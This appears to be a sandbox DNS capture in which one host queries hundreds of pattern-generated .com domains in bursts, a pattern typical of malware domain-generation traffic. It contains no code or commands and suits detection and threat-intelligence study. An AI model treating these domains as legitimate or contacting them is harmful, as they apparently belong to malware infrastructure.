Aug 23, 2024 18:47:50.155546904 CEST	192.168.2.4	1.1.1.1	0x8b31	Standard query (0)	volygyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.155873060 CEST	192.168.2.4	1.1.1.1	0xca7b	Standard query (0)	pumywov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.156138897 CEST	192.168.2.4	1.1.1.1	0xe8b1	Standard query (0)	qedyxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.156244040 CEST	192.168.2.4	1.1.1.1	0x51d6	Standard query (0)	galyfez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.156436920 CEST	192.168.2.4	1.1.1.1	0xb641	Standard query (0)	lysyxuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.156703949 CEST	192.168.2.4	1.1.1.1	0x1c3d	Standard query (0)	qekyfep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.156703949 CEST	192.168.2.4	1.1.1.1	0xa76	Standard query (0)	vonyqof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.157133102 CEST	192.168.2.4	1.1.1.1	0xe937	Standard query (0)	pupyxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.157290936 CEST	192.168.2.4	1.1.1.1	0x92a6	Standard query (0)	ganyqib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.157397032 CEST	192.168.2.4	1.1.1.1	0x74fb	Standard query (0)	qebyqig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.157601118 CEST	192.168.2.4	1.1.1.1	0xe136	Standard query (0)	vopyzyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.157974005 CEST	192.168.2.4	1.1.1.1	0x6aa8	Standard query (0)	gatyzyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.157974005 CEST	192.168.2.4	1.1.1.1	0xd4ac	Standard query (0)	lykyfax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.158052921 CEST	192.168.2.4	1.1.1.1	0xdf7a	Standard query (0)	pujydap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.158389091 CEST	192.168.2.4	1.1.1.1	0x6dc0	Standard query (0)	vojydoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.158389091 CEST	192.168.2.4	1.1.1.1	0xab6d	Standard query (0)	qetylel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.158499002 CEST	192.168.2.4	1.1.1.1	0x1260	Standard query (0)	lyvymun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.158785105 CEST	192.168.2.4	1.1.1.1	0xa7a6	Standard query (0)	puvymug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.158785105 CEST	192.168.2.4	1.1.1.1	0xdb57	Standard query (0)	gahydos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.158937931 CEST	192.168.2.4	1.1.1.1	0xe270	Standard query (0)	vocymum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.159113884 CEST	192.168.2.4	1.1.1.1	0x375b	Standard query (0)	purylal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.159115076 CEST	192.168.2.4	1.1.1.1	0xb72d	Standard query (0)	lyryler.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.159317017 CEST	192.168.2.4	1.1.1.1	0xa58c	Standard query (0)	gacynyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.159529924 CEST	192.168.2.4	1.1.1.1	0x3b5e	Standard query (0)	vowykat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.159529924 CEST	192.168.2.4	1.1.1.1	0xa0d6	Standard query (0)	qegysiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.159749985 CEST	192.168.2.4	1.1.1.1	0x652f	Standard query (0)	qexynyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.159749985 CEST	192.168.2.4	1.1.1.1	0xa584	Standard query (0)	lygysid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:50.159859896 CEST	192.168.2.4	1.1.1.1	0x19f4	Standard query (0)	pufypuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.031868935 CEST	192.168.2.4	1.1.1.1	0xf5a4	Standard query (0)	gaqykoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.039341927 CEST	192.168.2.4	1.1.1.1	0x2d96	Standard query (0)	lyxynej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.040000916 CEST	192.168.2.4	1.1.1.1	0x9d99	Standard query (0)	vofypuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.051379919 CEST	192.168.2.4	1.1.1.1	0x45ca	Standard query (0)	qeqykop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.051945925 CEST	192.168.2.4	1.1.1.1	0xe609	Standard query (0)	puzybeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.064344883 CEST	192.168.2.4	1.1.1.1	0x8f1e	Standard query (0)	gadypub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.089479923 CEST	192.168.2.4	1.1.1.1	0x98ba	Standard query (0)	volybak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.089565992 CEST	192.168.2.4	1.1.1.1	0x7327	Standard query (0)	lymyjix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.089683056 CEST	192.168.2.4	1.1.1.1	0xcf98	Standard query (0)	galyvaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.089889050 CEST	192.168.2.4	1.1.1.1	0xb1	Standard query (0)	qekyvol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.089936018 CEST	192.168.2.4	1.1.1.1	0x365d	Standard query (0)	vonyjuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.090073109 CEST	192.168.2.4	1.1.1.1	0xa304	Standard query (0)	pupyteg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.090141058 CEST	192.168.2.4	1.1.1.1	0xc42c	Standard query (0)	ganyhus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.090322018 CEST	192.168.2.4	1.1.1.1	0x96e8	Standard query (0)	vopyrem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.090424061 CEST	192.168.2.4	1.1.1.1	0xa3d3	Standard query (0)	qedytyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.090495110 CEST	192.168.2.4	1.1.1.1	0xc29a	Standard query (0)	pumyjip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.090563059 CEST	192.168.2.4	1.1.1.1	0xc66d	Standard query (0)	lysytyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.090728998 CEST	192.168.2.4	1.1.1.1	0xba02	Standard query (0)	lykyvor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.090728998 CEST	192.168.2.4	1.1.1.1	0x3e6f	Standard query (0)	qebyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.090897083 CEST	192.168.2.4	1.1.1.1	0x4a91	Standard query (0)	gatyrah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.091399908 CEST	192.168.2.4	1.1.1.1	0x4a2f	Standard query (0)	pujycil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.091967106 CEST	192.168.2.4	1.1.1.1	0x6229	Standard query (0)	lyvygyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.092159986 CEST	192.168.2.4	1.1.1.1	0x76d8	Standard query (0)	qetyraq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.092508078 CEST	192.168.2.4	1.1.1.1	0xd0e5	Standard query (0)	vojycit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.092823029 CEST	192.168.2.4	1.1.1.1	0x8b94	Standard query (0)	puvygyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.092982054 CEST	192.168.2.4	1.1.1.1	0xf36e	Standard query (0)	gahycuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.093189955 CEST	192.168.2.4	1.1.1.1	0x1c34	Standard query (0)	lyrywoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.093347073 CEST	192.168.2.4	1.1.1.1	0x1d72	Standard query (0)	vocygef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.093529940 CEST	192.168.2.4	1.1.1.1	0x62c2	Standard query (0)	qegyxup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.093664885 CEST	192.168.2.4	1.1.1.1	0x5b2f	Standard query (0)	purywoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.094147921 CEST	192.168.2.4	1.1.1.1	0x5974	Standard query (0)	gacyfeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.094307899 CEST	192.168.2.4	1.1.1.1	0x20c9	Standard query (0)	lygyxux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.094666004 CEST	192.168.2.4	1.1.1.1	0xf41e	Standard query (0)	vowyqik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.094849110 CEST	192.168.2.4	1.1.1.1	0x7446	Standard query (0)	qexyfag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.095098972 CEST	192.168.2.4	1.1.1.1	0x4658	Standard query (0)	gaqyqiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.095248938 CEST	192.168.2.4	1.1.1.1	0xa0c9	Standard query (0)	lyxyfan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.095700026 CEST	192.168.2.4	1.1.1.1	0x3228	Standard query (0)	vofyzyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.095858097 CEST	192.168.2.4	1.1.1.1	0xf9c0	Standard query (0)	pufyxyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.096224070 CEST	192.168.2.4	1.1.1.1	0x9eb	Standard query (0)	puzydog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.096429110 CEST	192.168.2.4	1.1.1.1	0xe735	Standard query (0)	qeqyqul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.096621037 CEST	192.168.2.4	1.1.1.1	0x4769	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.097529888 CEST	192.168.2.4	1.1.1.1	0x495a	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.097784996 CEST	192.168.2.4	1.1.1.1	0x6040	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.098074913 CEST	192.168.2.4	1.1.1.1	0x7a21	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.098234892 CEST	192.168.2.4	1.1.1.1	0x5180	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.098649025 CEST	192.168.2.4	1.1.1.1	0x3f5e	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.098927975 CEST	192.168.2.4	1.1.1.1	0x3584	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.099245071 CEST	192.168.2.4	1.1.1.1	0x33f8	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.099461079 CEST	192.168.2.4	1.1.1.1	0xde1	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.099978924 CEST	192.168.2.4	1.1.1.1	0xee5b	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.100137949 CEST	192.168.2.4	1.1.1.1	0xe1f5	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.100564003 CEST	192.168.2.4	1.1.1.1	0x4860	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.100825071 CEST	192.168.2.4	1.1.1.1	0x11ee	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.112195015 CEST	192.168.2.4	1.1.1.1	0xff37	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.112365007 CEST	192.168.2.4	1.1.1.1	0xace7	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.113445044 CEST	192.168.2.4	1.1.1.1	0x678a	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.281847000 CEST	192.168.2.4	1.1.1.1	0x1b1f	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.282116890 CEST	192.168.2.4	1.1.1.1	0xa8d8	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.282296896 CEST	192.168.2.4	1.1.1.1	0x71ae	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.293435097 CEST	192.168.2.4	1.1.1.1	0x7ee0	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.366261005 CEST	192.168.2.4	1.1.1.1	0x5239	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.366467953 CEST	192.168.2.4	1.1.1.1	0x338	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.366877079 CEST	192.168.2.4	1.1.1.1	0xe97f	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.367105007 CEST	192.168.2.4	1.1.1.1	0xc2ff	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.391834021 CEST	192.168.2.4	1.1.1.1	0x9835	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.392292976 CEST	192.168.2.4	1.1.1.1	0xd703	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.392748117 CEST	192.168.2.4	1.1.1.1	0xb584	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.393328905 CEST	192.168.2.4	1.1.1.1	0x4c40	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.394006968 CEST	192.168.2.4	1.1.1.1	0xf8ba	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.394202948 CEST	192.168.2.4	1.1.1.1	0x5e0b	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.395661116 CEST	192.168.2.4	1.1.1.1	0x4555	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.395972967 CEST	192.168.2.4	1.1.1.1	0x7a60	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.396464109 CEST	192.168.2.4	1.1.1.1	0xb93d	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.396706104 CEST	192.168.2.4	1.1.1.1	0xdbb6	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.397229910 CEST	192.168.2.4	1.1.1.1	0xe86c	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.400676012 CEST	192.168.2.4	1.1.1.1	0x786d	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.403822899 CEST	192.168.2.4	1.1.1.1	0x3d27	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.404377937 CEST	192.168.2.4	1.1.1.1	0xe6e9	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.404891968 CEST	192.168.2.4	1.1.1.1	0xb504	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.408199072 CEST	192.168.2.4	1.1.1.1	0x5c7c	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.408364058 CEST	192.168.2.4	1.1.1.1	0xab9	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.409169912 CEST	192.168.2.4	1.1.1.1	0x5fe2	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.410078049 CEST	192.168.2.4	1.1.1.1	0x521a	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.410379887 CEST	192.168.2.4	1.1.1.1	0xa33a	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.410552025 CEST	192.168.2.4	1.1.1.1	0x4527	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.411303043 CEST	192.168.2.4	1.1.1.1	0xf1d1	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.411427021 CEST	192.168.2.4	1.1.1.1	0x1cb7	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.411681890 CEST	192.168.2.4	1.1.1.1	0xd57f	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.411827087 CEST	192.168.2.4	1.1.1.1	0x3e7d	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.411995888 CEST	192.168.2.4	1.1.1.1	0x136a	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.412136078 CEST	192.168.2.4	1.1.1.1	0x1b64	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.412276030 CEST	192.168.2.4	1.1.1.1	0x190a	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.412410975 CEST	192.168.2.4	1.1.1.1	0x456	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.412549973 CEST	192.168.2.4	1.1.1.1	0xb9fa	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.412842035 CEST	192.168.2.4	1.1.1.1	0xabe6	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.413053036 CEST	192.168.2.4	1.1.1.1	0xe3e3	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.413259983 CEST	192.168.2.4	1.1.1.1	0x8bfa	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.413456917 CEST	192.168.2.4	1.1.1.1	0x50f8	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.413618088 CEST	192.168.2.4	1.1.1.1	0xefef	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.413866043 CEST	192.168.2.4	1.1.1.1	0xa09b	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.414082050 CEST	192.168.2.4	1.1.1.1	0xd0c7	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.414326906 CEST	192.168.2.4	1.1.1.1	0x97c0	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.414484978 CEST	192.168.2.4	1.1.1.1	0x77cb	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:51.414680958 CEST	192.168.2.4	1.1.1.1	0xe24f	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:52.356703043 CEST	192.168.2.4	1.1.1.1	0x5239	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.532422066 CEST	192.168.2.4	1.1.1.1	0xc1b4	Standard query (0)	pupydeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.533051968 CEST	192.168.2.4	1.1.1.1	0x5717	Standard query (0)	ganyzub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.533533096 CEST	192.168.2.4	1.1.1.1	0x241b	Standard query (0)	lykymox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.533934116 CEST	192.168.2.4	1.1.1.1	0x59ce	Standard query (0)	vopydek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.534445047 CEST	192.168.2.4	1.1.1.1	0x7dca	Standard query (0)	pujymip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.534647942 CEST	192.168.2.4	1.1.1.1	0x839	Standard query (0)	qebylug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.534981012 CEST	192.168.2.4	1.1.1.1	0x8927	Standard query (0)	gatydaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.535273075 CEST	192.168.2.4	1.1.1.1	0x37ac	Standard query (0)	lyvylyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.535805941 CEST	192.168.2.4	1.1.1.1	0x9af4	Standard query (0)	vojymic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.536309004 CEST	192.168.2.4	1.1.1.1	0xf5e	Standard query (0)	qetysal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.536780119 CEST	192.168.2.4	1.1.1.1	0x629c	Standard query (0)	puvylyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.537252903 CEST	192.168.2.4	1.1.1.1	0x4372	Standard query (0)	gahynus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.537744045 CEST	192.168.2.4	1.1.1.1	0x88f	Standard query (0)	lyrysor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.538258076 CEST	192.168.2.4	1.1.1.1	0x47ae	Standard query (0)	vocykem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.538535118 CEST	192.168.2.4	1.1.1.1	0x7f63	Standard query (0)	purypol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.538619995 CEST	192.168.2.4	1.1.1.1	0x6d8c	Standard query (0)	qegynuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.539277077 CEST	192.168.2.4	1.1.1.1	0x7e30	Standard query (0)	gacykeh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.539380074 CEST	192.168.2.4	1.1.1.1	0xed9	Standard query (0)	lygynud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.539788008 CEST	192.168.2.4	1.1.1.1	0x5b09	Standard query (0)	vowypit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.539908886 CEST	192.168.2.4	1.1.1.1	0xc8a9	Standard query (0)	qexykaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.540429115 CEST	192.168.2.4	1.1.1.1	0x91fb	Standard query (0)	gaqypiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.540445089 CEST	192.168.2.4	1.1.1.1	0x1e82	Standard query (0)	pufybyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.541172981 CEST	192.168.2.4	1.1.1.1	0x9453	Standard query (0)	lyxyjaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.541276932 CEST	192.168.2.4	1.1.1.1	0x51ec	Standard query (0)	vofybyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.541687012 CEST	192.168.2.4	1.1.1.1	0xaf4f	Standard query (0)	qeqytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.541906118 CEST	192.168.2.4	1.1.1.1	0x1cd2	Standard query (0)	puzyjoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.541966915 CEST	192.168.2.4	1.1.1.1	0x1271	Standard query (0)	gadyveb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.542490959 CEST	192.168.2.4	1.1.1.1	0x8904	Standard query (0)	lymytux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.542979956 CEST	192.168.2.4	1.1.1.1	0x96e9	Standard query (0)	volyjok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.543459892 CEST	192.168.2.4	1.1.1.1	0x4f17	Standard query (0)	qedyveg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.543915033 CEST	192.168.2.4	1.1.1.1	0x6078	Standard query (0)	pumytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.544610977 CEST	192.168.2.4	1.1.1.1	0x4ff4	Standard query (0)	galyhiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.545221090 CEST	192.168.2.4	1.1.1.1	0x8626	Standard query (0)	lysyvan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.545670986 CEST	192.168.2.4	1.1.1.1	0xe4d9	Standard query (0)	qekyhil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.545670986 CEST	192.168.2.4	1.1.1.1	0x7931	Standard query (0)	vonyryc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.546268940 CEST	192.168.2.4	1.1.1.1	0x94a8	Standard query (0)	pupycag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.546375036 CEST	192.168.2.4	1.1.1.1	0x6d11	Standard query (0)	ganyrys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.546998024 CEST	192.168.2.4	1.1.1.1	0xc943	Standard query (0)	lykygur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.547115088 CEST	192.168.2.4	1.1.1.1	0xa1e8	Standard query (0)	vopycom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.547662973 CEST	192.168.2.4	1.1.1.1	0x49cd	Standard query (0)	pujygul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.547696114 CEST	192.168.2.4	1.1.1.1	0x7a68	Standard query (0)	qebyrev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.548439026 CEST	192.168.2.4	1.1.1.1	0xedd1	Standard query (0)	gatycoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.548501968 CEST	192.168.2.4	1.1.1.1	0xed99	Standard query (0)	lyvywed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.549005032 CEST	192.168.2.4	1.1.1.1	0x20fb	Standard query (0)	vojygut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.549027920 CEST	192.168.2.4	1.1.1.1	0xd558	Standard query (0)	qetyxiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.549457073 CEST	192.168.2.4	1.1.1.1	0x2c9	Standard query (0)	puvywav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.550235987 CEST	192.168.2.4	1.1.1.1	0x966a	Standard query (0)	lyryxij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.550261974 CEST	192.168.2.4	1.1.1.1	0xf397	Standard query (0)	gahyfyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.550414085 CEST	192.168.2.4	1.1.1.1	0xea3c	Standard query (0)	vocyqaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.550757885 CEST	192.168.2.4	1.1.1.1	0x878e	Standard query (0)	qegyfyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.551069021 CEST	192.168.2.4	1.1.1.1	0x8cb1	Standard query (0)	gacyqob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.551326036 CEST	192.168.2.4	1.1.1.1	0x5432	Standard query (0)	lygyfex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.551631927 CEST	192.168.2.4	1.1.1.1	0xd275	Standard query (0)	vowyzuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.551915884 CEST	192.168.2.4	1.1.1.1	0xca47	Standard query (0)	qexyqog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.552206039 CEST	192.168.2.4	1.1.1.1	0xcaa0	Standard query (0)	pufydep.com	A (IP address)	IN (0x0001)	false
